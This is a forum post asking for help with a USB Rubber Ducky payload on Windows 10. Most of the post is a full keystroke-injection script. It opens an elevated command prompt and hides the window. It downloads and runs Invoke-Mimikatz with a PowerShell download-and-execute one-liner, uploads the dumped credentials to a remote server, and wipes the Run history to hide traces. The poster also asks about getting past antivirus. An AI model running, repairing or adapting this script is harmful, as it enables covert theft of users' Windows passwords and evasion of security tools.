I have been toying around with my Rubber Ducky for a couple days now and I have been doing some tests on Windows 10 64bit mostly. I am currently running twinduck version: c_duck_v2_S002. I was ideally looking for a payload that would use mimikatz to extract the windows password from the current user and save it onto the ducky itself but none have worked yet.
I also tried out the web server method with a local hosted apache2 web server(replacing the x's with my actual local hosted address):
DELAY 1000
REM Open an admin command prompt
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 1000
REM Obfuscate the command prompt
STRING mode con:cols=18 lines=1
ENTER
STRING color FE
ENTER
REM Download and execute Invoke Mimikatz then upload the results
STRING powershell "IEX (New-Object Net.WebClient).DownloadString('192.xxx.x.xx/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('192.xxx.x.xx/rx.php', $output)"
ENTER
DELAY 15000
REM Clear the Run history and exit
STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
ENTER
STRING exit
ENTER
I can access both the files from the targeted system with my browser so the web server is working fine. I am listening with netcat but never receives the data?? With: 'nc -l -p 80'. What am I doing wrong here?
Does mimikatz work if there's an anti-virus installed on the computer or it still works?
Windows 10 password grab.
in Classic USB Rubber Ducky
Posted
Does mimikatz work if there's an anti-virus installed on the computer or it still works?